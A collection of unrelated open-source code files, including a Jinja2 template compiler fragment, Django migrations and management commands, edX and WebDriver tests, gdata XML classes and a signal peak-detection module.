self.write(')')
def visit_CondExpr(self, node, frame):
def write_expr2():
if node.expr2 is not None:
return self.visit(node.expr2, frame)
self.write('environment.undefined(%r)' % ('the inline if-'
'expression on %s evaluated to false and '
'no else section was defined.' % self.position(node)))
if not have_condexpr:
self.write('((')
self.visit(node.test, frame)
self.write(') and (')
self.visit(node.expr1, frame)
self.write(',) or (')
write_expr2()
self.write(',))[0]')
else:
self.write('(')
self.visit(node.expr1, frame)
self.write(' if ')
self.visit(node.test, frame)
self.write(' else ')
write_expr2()
self.write(')')
def visit_Call(self, node, frame, forward_caller=False):
if self.environment.sandboxed:
self.write('environment.call(context, ')
else:
self.write('context.call(')
self.visit(node.node, frame)
extra_kwargs = forward_caller and {'caller': 'caller'} or None
self.signature(node, frame, extra_kwargs)
self.write(')')
def visit_Keyword(self, node, frame):
self.write(node.key + '=')
self.visit(node.value, frame)
# -- Unused nodes for extensions
def visit_MarkSafe(self, node, frame):
self.write('Markup(')
self.visit(node.expr, frame)
self.write(')')
def visit_MarkSafeIfAutoescape(self, node, frame):
self.write('(context.eval_ctx.autoescape and Markup or identity)(')
self.visit(node.expr, frame)
self.write(')')
def visit_EnvironmentAttribute(self, node, frame):
self.write('environment.' + node.name)
def visit_ExtensionAttribute(self, node, frame):
self.write('environment.extensions[%r].%s' % (node.identifier, node.name))
def visit_ImportedName(self, node, frame):
self.write(self.import_aliases[node.importname])
def visit_InternalName(self, node, frame):
self.write(node.name)
def visit_ContextReference(self, node, frame):
self.write('context')
def visit_Continue(self, node, frame):
self.writeline('continue', node)
def visit_Break(self, node, frame):
self.writeline('break', node)
def visit_Scope(self, node, frame):
scope_frame = frame.inner()
scope_frame.inspect(node.iter_child_nodes())
aliases = self.push_scope(scope_frame)
self.pull_locals(scope_frame)
self.blockvisit(node.body, scope_frame)
self.pop_scope(aliases, scope_frame)
def visit_EvalContextModifier(self, node, frame):
for keyword in node.options:
self.writeline('context.eval_ctx.%s = ' % keyword.key)
self.visit(keyword.value, frame)
try:
val = keyword.value.as_const(frame.eval_ctx)
except nodes.Impossible:
frame.eval_ctx.volatile = True
else:
setattr(frame.eval_ctx, keyword.key, val)
def visit_ScopedEvalContextModifier(self, node, frame):
old_ctx_name = self.temporary_identifier()
safed_ctx = frame.eval_ctx.save()
self.writeline('%s = context.eval_ctx.save()' % old_ctx_name)
self.visit_EvalContextModifier(node, frame)
for child in node.body:
self.visit(child, frame)
frame.eval_ctx.revert(safed_ctx)
self.writeline('context.eval_ctx.revert(%s)' % old_ctx_name)
| apache-2.0 |
Tigerwhit4/taiga-back | taiga/projects/custom_attributes/migrations/0005_auto_20150505_1639.py | 23 | 1088 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django_pgjson.fields
class Migration(migrations.Migration):
dependencies = [
('custom_attributes', '0004_create_empty_customattributesvalues_for_existen_object'),
]
operations = [
migrations.AlterField(
model_name='issuecustomattributesvalues',
name='attributes_values',
field=django_pgjson.fields.JsonField(verbose_name='values', default={}),
preserve_default=True,
),
migrations.AlterField(
model_name='taskcustomattributesvalues',
name='attributes_values',
field=django_pgjson.fields.JsonField(verbose_name='values', default={}),
preserve_default=True,
),
migrations.AlterField(
model_name='userstorycustomattributesvalues',
name='attributes_values',
field=django_pgjson.fields.JsonField(verbose_name='values', default={}),
preserve_default=True,
),
]
| agpl-3.0 |
Metronote/metronotesd-alpha | lib/burn.py | 1 | 3750 | #! /usr/bin/python3
import struct
import decimal
D = decimal.Decimal
from fractions import Fraction
from . import (util, config, exceptions, bitcoin, util)
"""Burn {} to earn {} during a special period of time.""".format(config.BTC, config.XMN)
ID = 60
def validate (db, source, destination, quantity, block_index, overburn=False):
problems = []
# Check destination address.
if destination != config.UNSPENDABLE:
problems.append('wrong destination address')
if not isinstance(quantity, int):
problems.append('quantity must be in satoshis')
return problems
if quantity < 0: problems.append('negative quantity')
# Try to make sure that the burned funds won't go to waste.
if block_index < config.BURN_START - 1:
problems.append('too early')
elif block_index > config.BURN_END:
problems.append('too late')
return problems
def compose (db, source, quantity, overburn=False):
cursor = db.cursor()
destination = config.UNSPENDABLE
problems = validate(db, source, destination, quantity, util.last_block(db)['block_index'], overburn=overburn)
if problems: raise exceptions.BurnError(problems)
# Check that a maximum of 1 BTC total is burned per address.
burns = list(cursor.execute('''SELECT * FROM burns WHERE (status = ? AND source = ?)''', ('valid', source)))
already_burned = sum([burn['burned'] for burn in burns])
if quantity > (1 * config.UNIT - already_burned) and not overburn:
raise exceptions.BurnError('1 {} may be burned per address'.format(config.BTC))
cursor.close()
return (source, [(destination, quantity)], None)
def parse (db, tx, message=None):
burn_parse_cursor = db.cursor()
status = 'valid'
if status == 'valid':
problems = validate(db, tx['source'], tx['destination'], tx['btc_amount'], tx['block_index'], overburn=False)
if problems: status = 'invalid: ' + '; '.join(problems)
if tx['btc_amount'] != None:
sent = tx['btc_amount']
else:
sent = 0
if status == 'valid':
# Calculate quantity of XMN earned. (Maximum 1 BTC in total, ever.)
cursor = db.cursor()
cursor.execute('''SELECT * FROM burns WHERE (status = ? AND source = ?)''', ('valid', tx['source']))
burns = cursor.fetchall()
already_burned = sum([burn['burned'] for burn in burns])
#ONE = 1 * config.UNIT
ONE = config.BURN_MAX * config.UNIT
max_burn = ONE - already_burned
if sent > max_burn: burned = max_burn # Exceeded maximum burn; earn what you can.
else: burned = sent
total_time = config.BURN_END - config.BURN_START
partial_time = config.BURN_END - tx['block_index']
#multiplier = (1000 + (500 * Fraction(partial_time, total_time)))
multiplier = config.BURN_MULTIPLIER * (1 + (.5 * Fraction(partial_time, total_time)))
earned = round(burned * multiplier)
# Credit source address with earned XMN.
util.credit(db, tx['block_index'], tx['source'], config.XMN, earned, event=tx['tx_hash'])
else:
burned = 0
earned = 0
# Add parsed transaction to message-type–specific table.
# TODO: store sent in table
bindings = {
'tx_index': tx['tx_index'],
'tx_hash': tx['tx_hash'],
'block_index': tx['block_index'],
'source': tx['source'],
'burned': burned,
'earned': earned,
'status': status,
}
sql='insert into burns values(:tx_index, :tx_hash, :block_index, :source, :burned, :earned, :status)'
burn_parse_cursor.execute(sql, bindings)
burn_parse_cursor.close()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| mit |
ufosky-server/zulip | analytics/management/commands/client_activity.py | 114 | 2830 | from __future__ import absolute_import
from django.core.management.base import BaseCommand
from django.db.models import Count
from zerver.models import UserActivity, UserProfile, Realm, \
get_realm, get_user_profile_by_email
import datetime
class Command(BaseCommand):
help = """Report rough client activity globally, for a realm, or for a user
Usage examples:
python manage.py client_activity
python manage.py client_activity zulip.com
python manage.py client_activity jesstess@zulip.com"""
def add_arguments(self, parser):
parser.add_argument('arg', metavar='<arg>', type=str, nargs='?', default=None,
help="realm or user to estimate client activity for")
def compute_activity(self, user_activity_objects):
# Report data from the past week.
#
# This is a rough report of client activity because we inconsistently
# register activity from various clients; think of it as telling you
# approximately how many people from a group have used a particular
# client recently. For example, this might be useful to get a sense of
# how popular different versions of a desktop client are.
#
# Importantly, this does NOT tell you anything about the relative
# volumes of requests from clients.
threshold = datetime.datetime.now() - datetime.timedelta(days=7)
client_counts = user_activity_objects.filter(
last_visit__gt=threshold).values("client__name").annotate(
count=Count('client__name'))
total = 0
counts = []
for client_type in client_counts:
count = client_type["count"]
client = client_type["client__name"]
total += count
counts.append((count, client))
counts.sort()
for count in counts:
print "%25s %15d" % (count[1], count[0])
print "Total:", total
def handle(self, *args, **options):
if options['arg'] is None:
# Report global activity.
self.compute_activity(UserActivity.objects.all())
else:
arg = options['arg']
try:
# Report activity for a user.
user_profile = get_user_profile_by_email(arg)
self.compute_activity(UserActivity.objects.filter(
user_profile=user_profile))
except UserProfile.DoesNotExist:
try:
# Report activity for a realm.
realm = get_realm(arg)
self.compute_activity(UserActivity.objects.filter(
user_profile__realm=realm))
except Realm.DoesNotExist:
print "Unknown user or domain %s" % (arg,)
exit(1)
| apache-2.0 |
moreati/uwsgi | tests/websockets.py | 13 | 2254 | #!./uwsgi --https :8443,foobar.crt,foobar.key --http-websockets --gevent 100 --module tests.websocket
import uwsgi
import gevent
from gevent.queue import JoinableQueue
from gevent.socket import wait_read
queue = JoinableQueue()
def application(env, sr):
ws_scheme = 'ws'
if 'HTTPS' in env or env['wsgi.url_scheme'] == 'https':
ws_scheme = 'wss'
if env['PATH_INFO'] == '/':
sr('200 OK', [('Content-Type', 'text/html')])
return """
<html>
<head>
<script language="Javascript">
var s = new WebSocket("%s://%s/foobar/");
s.onopen = function() {
alert("connected !!!");
s.send("ciao");
};
s.onmessage = function(e) {
var bb = document.getElementById('blackboard')
var html = bb.innerHTML;
bb.innerHTML = html + '<br/>' + e.data;
};
s.onerror = function(e) {
alert(e);
}
s.onclose = function(e) {
alert("connection closed");
}
function invia() {
var value = document.getElementById('testo').value;
s.send(value);
}
</script>
</head>
<body>
<h1>WebSocket</h1>
<input type="text" id="testo"/>
<input type="button" value="invia" onClick="invia();"/>
<div id="blackboard" style="width:640px;height:480px;background-color:black;color:white;border: solid 2px red;overflow:auto">
</div>
</body>
</html>
""" % (ws_scheme, env['HTTP_HOST'])
elif env['PATH_INFO'] == '/foobar/':
uwsgi.websocket_handshake(env['HTTP_SEC_WEBSOCKET_KEY'], env.get('HTTP_ORIGIN', ''))
print "websockets..."
while True:
msg = uwsgi.websocket_recv_nb()
if msg:
queue.put(msg)
else:
try:
wait_read(uwsgi.connection_fd(), 0.1)
except gevent.socket.timeout:
try:
msg = queue.get_nowait()
uwsgi.websocket_send(msg)
except:
pass
return ""
| gpl-2.0 |
franosincic/edx-platform | lms/djangoapps/discussion_api/tests/test_permissions.py | 34 | 4986 | """
Tests for discussion API permission logic
"""
import itertools
import ddt
from discussion_api.permissions import (
can_delete,
get_editable_fields,
get_initializable_comment_fields,
get_initializable_thread_fields,
)
from lms.lib.comment_client.comment import Comment
from lms.lib.comment_client.thread import Thread
from lms.lib.comment_client.user import User
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
def _get_context(requester_id, is_requester_privileged, is_cohorted=False, thread=None):
"""Return a context suitable for testing the permissions module"""
return {
"cc_requester": User(id=requester_id),
"is_requester_privileged": is_requester_privileged,
"course": CourseFactory(cohort_config={"cohorted": is_cohorted}),
"thread": thread,
}
@ddt.ddt
class GetInitializableFieldsTest(ModuleStoreTestCase):
"""Tests for get_*_initializable_fields"""
@ddt.data(*itertools.product([True, False], [True, False]))
@ddt.unpack
def test_thread(self, is_privileged, is_cohorted):
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
is_cohorted=is_cohorted
)
actual = get_initializable_thread_fields(context)
expected = {
"abuse_flagged", "course_id", "following", "raw_body", "read", "title", "topic_id", "type", "voted"
}
if is_privileged and is_cohorted:
expected |= {"group_id"}
self.assertEqual(actual, expected)
@ddt.data(*itertools.product([True, False], ["question", "discussion"], [True, False]))
@ddt.unpack
def test_comment(self, is_thread_author, thread_type, is_privileged):
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
thread=Thread(user_id="5" if is_thread_author else "6", thread_type=thread_type)
)
actual = get_initializable_comment_fields(context)
expected = {
"abuse_flagged", "parent_id", "raw_body", "thread_id", "voted"
}
if (is_thread_author and thread_type == "question") or is_privileged:
expected |= {"endorsed"}
self.assertEqual(actual, expected)
@ddt.ddt
class GetEditableFieldsTest(ModuleStoreTestCase):
"""Tests for get_editable_fields"""
@ddt.data(*itertools.product([True, False], [True, False], [True, False]))
@ddt.unpack
def test_thread(self, is_author, is_privileged, is_cohorted):
thread = Thread(user_id="5" if is_author else "6", type="thread")
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
is_cohorted=is_cohorted
)
actual = get_editable_fields(thread, context)
expected = {"abuse_flagged", "following", "read", "voted"}
if is_author or is_privileged:
expected |= {"topic_id", "type", "title", "raw_body"}
if is_privileged and is_cohorted:
expected |= {"group_id"}
self.assertEqual(actual, expected)
@ddt.data(*itertools.product([True, False], [True, False], ["question", "discussion"], [True, False]))
@ddt.unpack
def test_comment(self, is_author, is_thread_author, thread_type, is_privileged):
comment = Comment(user_id="5" if is_author else "6", type="comment")
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
thread=Thread(user_id="5" if is_thread_author else "6", thread_type=thread_type)
)
actual = get_editable_fields(comment, context)
expected = {"abuse_flagged", "voted"}
if is_author or is_privileged:
expected |= {"raw_body"}
if (is_thread_author and thread_type == "question") or is_privileged:
expected |= {"endorsed"}
self.assertEqual(actual, expected)
@ddt.ddt
class CanDeleteTest(ModuleStoreTestCase):
"""Tests for can_delete"""
@ddt.data(*itertools.product([True, False], [True, False]))
@ddt.unpack
def test_thread(self, is_author, is_privileged):
thread = Thread(user_id="5" if is_author else "6")
context = _get_context(requester_id="5", is_requester_privileged=is_privileged)
self.assertEqual(can_delete(thread, context), is_author or is_privileged)
@ddt.data(*itertools.product([True, False], [True, False], [True, False]))
@ddt.unpack
def test_comment(self, is_author, is_thread_author, is_privileged):
comment = Comment(user_id="5" if is_author else "6")
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
thread=Thread(user_id="5" if is_thread_author else "6")
)
self.assertEqual(can_delete(comment, context), is_author or is_privileged)
| agpl-3.0 |
norayr/unisubs | libs/bulkops.py | 6 | 3083 | # TODO: Remove this once the new data model lands.
# This is from http://www.caktusgroup.com/blog/2011/09/20/bulk-inserts-django/
# Bulk insert/update DB operations for the Django ORM. Useful when
# inserting/updating lots of objects where the bottleneck is overhead
# in talking to the database. Instead of doing this
#
# for x in seq:
# o = SomeObject()
# o.foo = x
# o.save()
#
# or equivalently this
#
# for x in seq:
# SomeObject.objects.create(foo=x)
#
# do this
#
# l = []
# for x in seq:
# o = SomeObject()
# o.foo = x
# l.append(o)
# insert_many(l)
#
# Note that these operations are really simple. They won't work with
# many-to-many relationships, and you may have to divide really big
# lists into smaller chunks before sending them through.
#
# History
# 2010-12-10: quote column names, reported by Beres Botond.
def insert_many(objects, using="default"):
"""Insert list of Django objects in one SQL query. Objects must be
of the same Django model. Note that save is not called and signals
on the model are not raised."""
if not objects:
return
import django.db.models
from django.db import connections, transaction
con = connections[using]
model = objects[0].__class__
fields = [f for f in model._meta.fields if not isinstance(f, django.db.models.AutoField)]
parameters = []
for o in objects:
parameters.append(tuple(f.get_db_prep_save(f.pre_save(o, True), connection=con) for f in fields))
table = model._meta.db_table
column_names = ",".join(con.ops.quote_name(f.column) for f in fields)
placeholders = ",".join(("%s",) * len(fields))
con.cursor().executemany(
"insert into %s (%s) values (%s)" % (table, column_names, placeholders),
parameters)
transaction.commit_unless_managed()
def update_many(objects, fields=[], using="default"):
"""Update list of Django objects in one SQL query, optionally only
overwrite the given fields (as names, e.g. fields=["foo"]).
Objects must be of the same Django model. Note that save is not
called and signals on the model are not raised."""
if not objects:
return
import django.db.models
from django.db import connections, transaction
con = connections[using]
names = fields
meta = objects[0]._meta
fields = [f for f in meta.fields if not isinstance(f, django.db.models.AutoField) and (not names or f.name in names)]
if not fields:
raise ValueError("No fields to update, field names are %s." % names)
fields_with_pk = fields + [meta.pk]
parameters = []
for o in objects:
parameters.append(tuple(f.get_db_prep_save(f.pre_save(o, True), connection=con) for f in fields_with_pk))
table = meta.db_table
assignments = ",".join(("%s=%%s"% con.ops.quote_name(f.column)) for f in fields)
con.cursor().executemany(
"update %s set %s where %s=%%s" % (table, assignments, con.ops.quote_name(meta.pk.column)),
parameters)
transaction.commit_unless_managed()
| agpl-3.0 |
onyxfish/stovetop | gdata/webmastertools/data.py | 126 | 5504 | #!/usr/bin/python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the data classes of the Google Webmaster Tools Data API"""
__author__ = 'j.s@google.com (Jeff Scudder)'
import atom.core
import atom.data
import gdata.data
import gdata.opensearch.data
WT_TEMPLATE = '{http://schemas.google.com/webmaster/tools/2007/}%s'
class CrawlIssueCrawlType(atom.core.XmlElement):
"""Type of crawl of the crawl issue"""
_qname = WT_TEMPLATE % 'crawl-type'
class CrawlIssueDateDetected(atom.core.XmlElement):
"""Detection date for the issue"""
_qname = WT_TEMPLATE % 'date-detected'
class CrawlIssueDetail(atom.core.XmlElement):
"""Detail of the crawl issue"""
_qname = WT_TEMPLATE % 'detail'
class CrawlIssueIssueType(atom.core.XmlElement):
"""Type of crawl issue"""
_qname = WT_TEMPLATE % 'issue-type'
class CrawlIssueLinkedFromUrl(atom.core.XmlElement):
"""Source URL that links to the issue URL"""
_qname = WT_TEMPLATE % 'linked-from'
class CrawlIssueUrl(atom.core.XmlElement):
"""URL affected by the crawl issue"""
_qname = WT_TEMPLATE % 'url'
class CrawlIssueEntry(gdata.data.GDEntry):
"""Describes a crawl issue entry"""
date_detected = CrawlIssueDateDetected
url = CrawlIssueUrl
detail = CrawlIssueDetail
issue_type = CrawlIssueIssueType
crawl_type = CrawlIssueCrawlType
linked_from = [CrawlIssueLinkedFromUrl]
class CrawlIssuesFeed(gdata.data.GDFeed):
"""Feed of crawl issues for a particular site"""
entry = [CrawlIssueEntry]
class Indexed(atom.core.XmlElement):
"""Describes the indexing status of a site"""
_qname = WT_TEMPLATE % 'indexed'
class Keyword(atom.core.XmlElement):
"""A keyword in a site or in a link to a site"""
_qname = WT_TEMPLATE % 'keyword'
source = 'source'
class KeywordEntry(gdata.data.GDEntry):
"""Describes a keyword entry"""
class KeywordsFeed(gdata.data.GDFeed):
"""Feed of keywords for a particular site"""
entry = [KeywordEntry]
keyword = [Keyword]
class LastCrawled(atom.core.XmlElement):
"""Describes the last crawled date of a site"""
_qname = WT_TEMPLATE % 'last-crawled'
class MessageBody(atom.core.XmlElement):
"""Message body"""
_qname = WT_TEMPLATE % 'body'
class MessageDate(atom.core.XmlElement):
"""Message date"""
_qname = WT_TEMPLATE % 'date'
class MessageLanguage(atom.core.XmlElement):
"""Message language"""
_qname = WT_TEMPLATE % 'language'
class MessageRead(atom.core.XmlElement):
"""Indicates if the message has already been read"""
_qname = WT_TEMPLATE % 'read'
class MessageSubject(atom.core.XmlElement):
"""Message subject"""
_qname = WT_TEMPLATE % 'subject'
class SiteId(atom.core.XmlElement):
"""Site URL"""
_qname = WT_TEMPLATE % 'id'
class MessageEntry(gdata.data.GDEntry):
"""Describes a message entry"""
wt_id = SiteId
subject = MessageSubject
date = MessageDate
body = MessageBody
language = MessageLanguage
read = MessageRead
class MessagesFeed(gdata.data.GDFeed):
"""Describes a messages feed"""
entry = [MessageEntry]
class SitemapEntry(gdata.data.GDEntry):
"""Describes a sitemap entry"""
indexed = Indexed
wt_id = SiteId
class SitemapMobileMarkupLanguage(atom.core.XmlElement):
"""Describes a markup language for URLs in this sitemap"""
_qname = WT_TEMPLATE % 'sitemap-mobile-markup-language'
class SitemapMobile(atom.core.XmlElement):
"""Lists acceptable mobile markup languages for URLs in this sitemap"""
_qname = WT_TEMPLATE % 'sitemap-mobile'
sitemap_mobile_markup_language = [SitemapMobileMarkupLanguage]
class SitemapNewsPublicationLabel(atom.core.XmlElement):
"""Specifies the publication label for this sitemap"""
_qname = WT_TEMPLATE % 'sitemap-news-publication-label'
class SitemapNews(atom.core.XmlElement):
"""Lists publication labels for this sitemap"""
_qname = WT_TEMPLATE % 'sitemap-news'
sitemap_news_publication_label = [SitemapNewsPublicationLabel]
class SitemapType(atom.core.XmlElement):
"""Indicates the type of sitemap. Not used for News or Mobile Sitemaps"""
_qname = WT_TEMPLATE % 'sitemap-type'
class SitemapUrlCount(atom.core.XmlElement):
"""Indicates the number of URLs contained in the sitemap"""
_qname = WT_TEMPLATE % 'sitemap-url-count'
class SitemapsFeed(gdata.data.GDFeed):
"""Describes a sitemaps feed"""
entry = [SitemapEntry]
class VerificationMethod(atom.core.XmlElement):
"""Describes a verification method that may be used for a site"""
_qname = WT_TEMPLATE % 'verification-method'
in_use = 'in-use'
type = 'type'
class Verified(atom.core.XmlElement):
"""Describes the verification status of a site"""
_qname = WT_TEMPLATE % 'verified'
class SiteEntry(gdata.data.GDEntry):
"""Describes a site entry"""
indexed = Indexed
wt_id = SiteId
verified = Verified
last_crawled = LastCrawled
verification_method = [VerificationMethod]
class SitesFeed(gdata.data.GDFeed):
"""Describes a sites feed"""
entry = [SiteEntry]
| mit |
benjaminsoellner/2015_Data_Analyst_Project_3 | Lesson_5_Analyzing_Data/16-Same_Operator/population.py | 3 | 2354 | #!/usr/bin/env python
"""
In an earlier exercise we looked at the cities dataset and asked which region in India contains
the most cities. In this exercise, we'd like you to answer a related question regarding regions in
India. What is the average city population for a region in India? Calculate your answer by first
finding the average population of cities in each region and then by calculating the average of the
regional averages.
Hint: If you want to accumulate using values from all input documents to a group stage, you may use
a constant as the value of the "_id" field. For example,
{ "$group" : "India Regional City Population Average",
... }
Please modify only the 'make_pipeline' function so that it creates and returns an aggregation
pipeline that can be passed to the MongoDB aggregate function. As in our examples in this lesson,
the aggregation pipeline should be a list of one or more dictionary objects.
Please review the lesson examples if you are unsure of the syntax.
Your code will be run against a MongoDB instance that we have provided. If you want to run this code
locally on your machine, you have to install MongoDB, download and insert the dataset.
For instructions related to MongoDB setup and datasets please see Course Materials.
Please note that the dataset you are using here is a smaller version of the twitter dataset used
in examples in this lesson. If you attempt some of the same queries that we looked at in the lesson
examples, your results will be different.
"""
def get_db(db_name):
from pymongo import MongoClient
client = MongoClient('localhost:27017')
db = client[db_name]
return db
def make_pipeline():
# complete the aggregation pipeline
pipeline = [{"$match": {"country": "India"}},
{"$unwind": "$isPartOf"},
{"$group": {"_id": "$isPartOf", "avg": {"$avg": "$population"}}},
{"$group": {"_id": "avg", "avg": {"$avg": "$avg"}}}]
return pipeline
def aggregate(db, pipeline):
result = db.cities.aggregate(pipeline)
return result
if __name__ == '__main__':
db = get_db('examples')
pipeline = make_pipeline()
result = aggregate(db, pipeline)
assert len(result["result"]) == 1
assert result["result"][0]["avg"] == 196025.97814809752
import pprint
pprint.pprint(result)
| agpl-3.0 |
askeing/servo | tests/wpt/web-platform-tests/webdriver/tests/actions/mouse.py | 3 | 4720 | import pytest
from tests.actions.support.mouse import get_center
from tests.actions.support.refine import get_events, filter_dict
from tests.support.asserts import assert_move_to_coordinates
from tests.support.inline import inline
from tests.support.wait import wait
def link_doc(dest):
content = "<a href=\"{}\" id=\"link\">destination</a>".format(dest)
return inline(content)
# TODO use pytest.approx once we upgrade to pytest > 3.0
def approx(n, m, tolerance=1):
return abs(n - m) <= tolerance
def test_click_at_coordinates(session, test_actions_page, mouse_chain):
div_point = {
"x": 82,
"y": 187,
}
mouse_chain \
.pointer_move(div_point["x"], div_point["y"], duration=1000) \
.click() \
.perform()
events = get_events(session)
assert len(events) == 4
assert_move_to_coordinates(div_point, "outer", events)
for e in events:
if e["type"] != "mousedown":
assert e["buttons"] == 0
assert e["button"] == 0
expected = [
{"type": "mousedown", "buttons": 1},
{"type": "mouseup", "buttons": 0},
{"type": "click", "buttons": 0},
]
filtered_events = [filter_dict(e, expected[0]) for e in events]
assert expected == filtered_events[1:]
def test_context_menu_at_coordinates(session, test_actions_page, mouse_chain):
div_point = {
"x": 82,
"y": 187,
}
mouse_chain \
.pointer_move(div_point["x"], div_point["y"]) \
.pointer_down(button=2) \
.pointer_up(button=2) \
.perform()
events = get_events(session)
expected = [
{"type": "mousedown", "button": 2},
{"type": "contextmenu", "button": 2},
]
assert len(events) == 4
filtered_events = [filter_dict(e, expected[0]) for e in events]
mousedown_contextmenu_events = [
x for x in filtered_events
if x["type"] in ["mousedown", "contextmenu"]
]
assert expected == mousedown_contextmenu_events
def test_click_element_center(session, test_actions_page, mouse_chain):
outer = session.find.css("#outer", all=False)
center = get_center(outer.rect)
mouse_chain.click(element=outer).perform()
events = get_events(session)
assert len(events) == 4
event_types = [e["type"] for e in events]
assert ["mousemove", "mousedown", "mouseup", "click"] == event_types
for e in events:
if e["type"] != "mousemove":
assert approx(e["pageX"], center["x"])
assert approx(e["pageY"], center["y"])
assert e["target"] == "outer"
def test_click_navigation(session, url, release_actions):
destination = url("/webdriver/tests/actions/support/test_actions_wdspec.html")
start = link_doc(destination)
def click(link):
mouse_chain = session.actions.sequence(
"pointer", "pointer_id", {"pointerType": "mouse"})
mouse_chain.click(element=link).perform()
session.url = start
error_message = "Did not navigate to %s" % destination
click(session.find.css("#link", all=False))
wait(session, lambda s: s.url == destination, error_message)
# repeat steps to check behaviour after document unload
session.url = start
click(session.find.css("#link", all=False))
wait(session, lambda s: s.url == destination, error_message)
@pytest.mark.parametrize("drag_duration", [0, 300, 800])
@pytest.mark.parametrize("dx, dy",
[(20, 0), (0, 15), (10, 15), (-20, 0), (10, -15), (-10, -15)])
def test_drag_and_drop(session,
test_actions_page,
mouse_chain,
dx,
dy,
drag_duration):
drag_target = session.find.css("#dragTarget", all=False)
initial_rect = drag_target.rect
initial_center = get_center(initial_rect)
# Conclude chain with extra move to allow time for last queued
# coordinate-update of drag_target and to test that drag_target is "dropped".
mouse_chain \
.pointer_move(0, 0, origin=drag_target) \
.pointer_down() \
.pointer_move(dx, dy, duration=drag_duration, origin="pointer") \
.pointer_up() \
.pointer_move(80, 50, duration=100, origin="pointer") \
.perform()
# mouseup that ends the drag is at the expected destination
e = get_events(session)[1]
assert e["type"] == "mouseup"
assert approx(e["pageX"], initial_center["x"] + dx)
assert approx(e["pageY"], initial_center["y"] + dy)
# check resulting location of the dragged element
final_rect = drag_target.rect
assert initial_rect["x"] + dx == final_rect["x"]
assert initial_rect["y"] + dy == final_rect["y"]
| mpl-2.0 |
piMoll/SEILAPLAN | tool/peakdetect.py | 1 | 27677 | # -*- coding: utf-8 -*-
import numpy as np
from math import pi, log
try:
from scipy import fft, ifft
from scipy.optimize import curve_fit
except ModuleNotFoundError:
# Import error is handled in seilaplanPlugin.py run() function
pass
i = 10000
x = np.linspace(0, 3.5 * pi, i)
y = (0.3*np.sin(x) + np.sin(1.3 * x) + 0.9 * np.sin(4.2 * x) + 0.06 *
np.random.randn(i))
def _datacheck_peakdetect(x_axis, y_axis):
if x_axis is None:
x_axis = range(len(y_axis))
if len(y_axis) != len(x_axis):
raise ValueError('Input vectors y_axis and x_axis must have same length')
#needs to be a numpy array
y_axis = np.array(y_axis)
x_axis = np.array(x_axis)
return x_axis, y_axis
def _peakdetect_parabole_fitter(raw_peaks, x_axis, y_axis, points):
"""
Performs the actual parabole fitting for the peakdetect_parabole function.
keyword arguments:
raw_peaks -- A list of either the maximium or the minimum peaks, as given
by the peakdetect_zero_crossing function, with index used as x-axis
x_axis -- A numpy list of all the x values
y_axis -- A numpy list of all the y values
points -- How many points around the peak should be used during curve
fitting, must be odd.
return -- A list giving all the peaks and the fitted waveform, format:
[[x, y, [fitted_x, fitted_y]]]
"""
func = lambda x, k, tau, m: k * ((x - tau) ** 2) + m
fitted_peaks = []
for peak in raw_peaks:
index = peak[0]
x_data = x_axis[index - points // 2: index + points // 2 + 1]
y_data = y_axis[index - points // 2: index + points // 2 + 1]
# get a first approximation of tau (peak position in time)
tau = x_axis[index]
# get a first approximation of peak amplitude
m = peak[1]
# build list of approximations
# k = -m as first approximation?
p0 = (-m, tau, m)
popt, pcov = curve_fit(func, x_data, y_data, p0)
# retrieve tau and m i.e x and y value of peak
x, y = popt[1:3]
# create a high resolution data set for the fitted waveform
x2 = np.linspace(x_data[0], x_data[-1], points * 10)
y2 = func(x2, *popt)
fitted_peaks.append([x, y, [x2, y2]])
return fitted_peaks
def peakdetect(y_axis, x_axis = None, lookahead = 300, delta=0):
"""
Converted from/based on a MATLAB script at:
http://billauer.co.il/peakdet.html
function for detecting local maximas and minmias in a signal.
Discovers peaks by searching for values which are surrounded by lower
or larger values for maximas and minimas respectively
keyword arguments:
y_axis -- A list containg the signal over which to find peaks
x_axis -- (optional) A x-axis whose values correspond to the y_axis list
and is used in the return to specify the postion of the peaks. If
omitted an index of the y_axis is used. (default: None)
lookahead -- (optional) distance to look ahead from a peak candidate to
determine if it is the actual peak (default: 200)
'(sample / period) / f' where '4 >= f >= 1.25' might be a good value
delta -- (optional) this specifies a minimum difference between a peak and
the following points, before a peak may be considered a peak. Useful
to hinder the function from picking up false peaks towards to end of
the signal. To work well delta should be set to delta >= RMSnoise * 5.
(default: 0)
delta function causes a 20% decrease in speed, when omitted
Correctly used it can double the speed of the function
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a tupple
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*tab)
"""
max_peaks = []
min_peaks = []
dump = [] #Used to pop the first hit which almost always is false
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
# store data length for later use
length = len(y_axis)
#perform some checks
if lookahead < 1:
raise ValueError("Lookahead must be '1' or above in value")
if not (np.isscalar(delta) and delta >= 0):
raise ValueError("delta must be a positive number")
#maxima and minima candidates are temporarily stored in
#mx and mn respectively
mn, mx = np.Inf, -np.Inf
#Only detect peak if there is 'lookahead' amount of points after it
for index, (x, y) in enumerate(zip(x_axis[:-lookahead],
y_axis[:-lookahead])):
if y > mx:
mx = y
mxpos = x
if y < mn:
mn = y
mnpos = x
####look for max####
if y < mx-delta and mx != np.Inf:
#Maxima peak candidate found
#look ahead in signal to ensure that this is a peak and not jitter
if y_axis[index:index+lookahead].max() < mx:
max_peaks.append([mxpos, mx])
